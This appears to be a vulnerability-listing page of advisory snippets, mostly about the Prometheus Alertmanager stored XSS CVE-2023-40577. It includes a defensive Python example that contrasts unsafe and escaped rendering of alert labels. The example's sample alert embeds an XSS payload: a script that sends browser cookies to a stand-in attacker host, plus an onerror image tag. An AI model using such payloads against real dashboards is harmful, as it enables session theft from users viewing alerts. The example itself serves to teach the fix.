This Week in Spring - September 5th, 2023
Hi, Spring fans! Welcome to another installment of This Week in Spring! How are you? I just got back from another fabulous Labor Day weekend, and am headed to Oslo, Norway, for the fabulous JavaZone 2023 event. This will be my first time returning to lovely Oslo, Norway, since the pandemic! I can...
CVE-2023-40577
Prometheus Alertmanager is vulnerable to cross-site scripting due to improper validation of user-supplied input by the /api/v1/alerts endpoint. This issue could allow a remote attacker to inject malicious script into a web page, which would be executed in a victim's web browser within the hosting...
Security Bulletin: IBM MQ Operator and Queue manager container images are vulnerable to multiple vulnerabilities from systemd, libcap, openssl-libs, libxml2, go-toolset, and prometheus-operator
Summary Multiple issues were identified in Red Hat UBI packages systemd, libcap, openssl-libs, libxml2, go-toolset, and prometheus-operator that were shipped with IBM MQ Operator and IBM supplied MQ Advanced container images. IBM has addressed the vulnerabilities. Vulnerability Details...
CVE-2023-40577 vulnerabilities
Vulnerabilities for packages: prometheus-alertmanager...
DEBIAN-CVE-2023-40577
Alertmanager handles alerts sent by client applications such as the Prometheus server. An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. This issue has been fixed in...
CVE-2023-40577
Alertmanager handles alerts sent by client applications such as the Prometheus server. An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. This issue has been fixed in...
CVE-2023-40577
CVE-2023-40577 affects Prometheus Alertmanager. The issue allows an attacker with POST permission on the /api/v1/alerts endpoint to cause arbitrary JavaScript execution in users of Alertmanager (stored XSS). The vulnerability is tied to the Alertmanager component handling incoming aler...
CVE-2023-40577 Alertmanager UI is vulnerable to stored XSS via the /api/v1/alerts endpoint
Alertmanager handles alerts sent by client applications such as the Prometheus server. An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. This issue has been fixed in...
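The entries above describe the same pattern: alert labels and annotations accepted from an authenticated POST to /api/v1/alerts are later rendered in the Alertmanager UI, so any markup in those values is executed in the browser of whoever views the alert. The following is an added illustration, not Alertmanager's own code and not a reproduction of the actual vulnerable path: it contrasts a naive string-concatenation renderer with one that HTML-escapes every untrusted value, and adds a small check that flags alert payloads carrying markup so they can be logged or rejected at ingestion. The payload, label names and the `attacker.example` host are constructed for the example.

```python
import html
import json
import re

# Constructed sample body in the shape a client would POST to /api/v1/alerts.
# The markup-bearing label and annotation are fabricated to show the failure mode.
SAMPLE_ALERTS_JSON = json.dumps([
    {
        "labels": {"alertname": "HighLatency", "severity": "warning", "instance": "web-1:9090"},
        "annotations": {"summary": "p99 latency above 500ms"},
    },
    {
        "labels": {"alertname": "DiskFull", "severity": "<img src=x onerror=alert(1)>"},
        "annotations": {
            "summary": "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
        },
    },
])

# Matches an opening or closing HTML tag anywhere in a string.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def load_sample_alerts():
    """Parse the constructed POST body into the list-of-alerts structure."""
    return json.loads(SAMPLE_ALERTS_JSON)


def render_alerts_unsafe(alerts):
    """Vulnerable pattern: untrusted label/annotation values are concatenated into HTML verbatim."""
    rows = []
    for alert in alerts:
        cells = "".join(f"<td>{k}={v}</td>" for k, v in alert["labels"].items())
        summary = alert["annotations"].get("summary", "")
        rows.append(f"<tr>{cells}<td>{summary}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


def render_alerts_safe(alerts):
    """Hardened pattern: every untrusted string is escaped at the point it enters markup.

    html.escape converts < > & " ' so a value can only ever be text, never a tag or attribute.
    """
    rows = []
    for alert in alerts:
        cells = "".join(
            f"<td>{html.escape(k)}={html.escape(v)}</td>" for k, v in alert["labels"].items()
        )
        summary = html.escape(alert["annotations"].get("summary", ""))
        rows.append(f"<tr>{cells}<td>{summary}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


def find_markup_in_alerts(alerts):
    """Ingestion-side check: return (alert index, field path, value) for every value containing a tag.

    Output escaping is the real fix; this check only makes abuse of the endpoint visible in logs.
    """
    hits = []
    for idx, alert in enumerate(alerts):
        for section in ("labels", "annotations"):
            for key, value in alert.get(section, {}).items():
                if TAG_RE.search(value):
                    hits.append((idx, f"{section}.{key}", value))
    return hits


if __name__ == "__main__":
    alerts = load_sample_alerts()
    for idx, path, value in find_markup_in_alerts(alerts):
        print(f"alert[{idx}] {path} contains markup: {value!r}")
    print(render_alerts_safe(alerts))
```

The distinction matters for the fix described in the advisories: rejecting or logging suspicious values at /api/v1/alerts is defence in depth, but the UI must escape on render regardless, because the endpoint is meant to accept arbitrary label values from legitimate senders.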
GHSA-V86X-5FM3-5P7J vulnerabilities
Vulnerabilities for packages: prometheus-alertmanager...
PT-2023-35948 · Git +1 · Fluent-Bit
Name of the Vulnerable Software and Affected Versions: No specific software or versions are mentioned in the provided description. Description: The issue is related to a crash type identified as Invalid-free. The crash state involves several functions, including reset context and cmt decode...
Information Disclosure
GitLab is vulnerable to information disclosure. The vulnerability exists because the Google IAP details in the Prometheus integration are not properly hidden, which leaks project settings and instance and group details to other users...
Server-Side Request Forgery (SSRF)
GitLab is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability occurs through the Prometheus integration in GitLab, which could lead to an SSRF attack...
SUSE: Security Advisory (SUSE-SU-2023:3144-1)
The remote host is missing the update described in SUSE-SU-2023:3144-1 (Greenbone/OpenVAS check; SPDX-FileCopyrightText: 2023 Greenbone AG, SPDX-License-Identifier: GPL-2.0-only; some text descriptions might be excerpted from referenced sources and are copyright their respective right holders)...
GHSA-2WRH-6PVC-2JM9 vulnerabilities
Vulnerabilities for packages: aws-load-balancer-controller, rqlite, trillian, kiam, flux-notification-controller, node-problem-detector, aactl, yq, kube-state-metrics, crossplane-provider-aws, external-dns-fips, dynamic-localpv-provisioner, aws-ebs-csi-driver, flux-source-controller,...
CVE-2023-3978 vulnerabilities
Vulnerabilities for packages: aws-load-balancer-controller, rqlite, trillian, kiam, flux-notification-controller, node-problem-detector, aactl, yq, kube-state-metrics, crossplane-provider-aws, external-dns-fips, dynamic-localpv-provisioner, aws-ebs-csi-driver, flux-source-controller,...
AZL-35120 CVE-2023-3978 affecting package prometheus-adapter for versions less than 0.12.0-1
Text nodes not in the HTML namespace are incorrectly literally rendered, causing text which should be escaped to not be. This could lead to an XSS attack...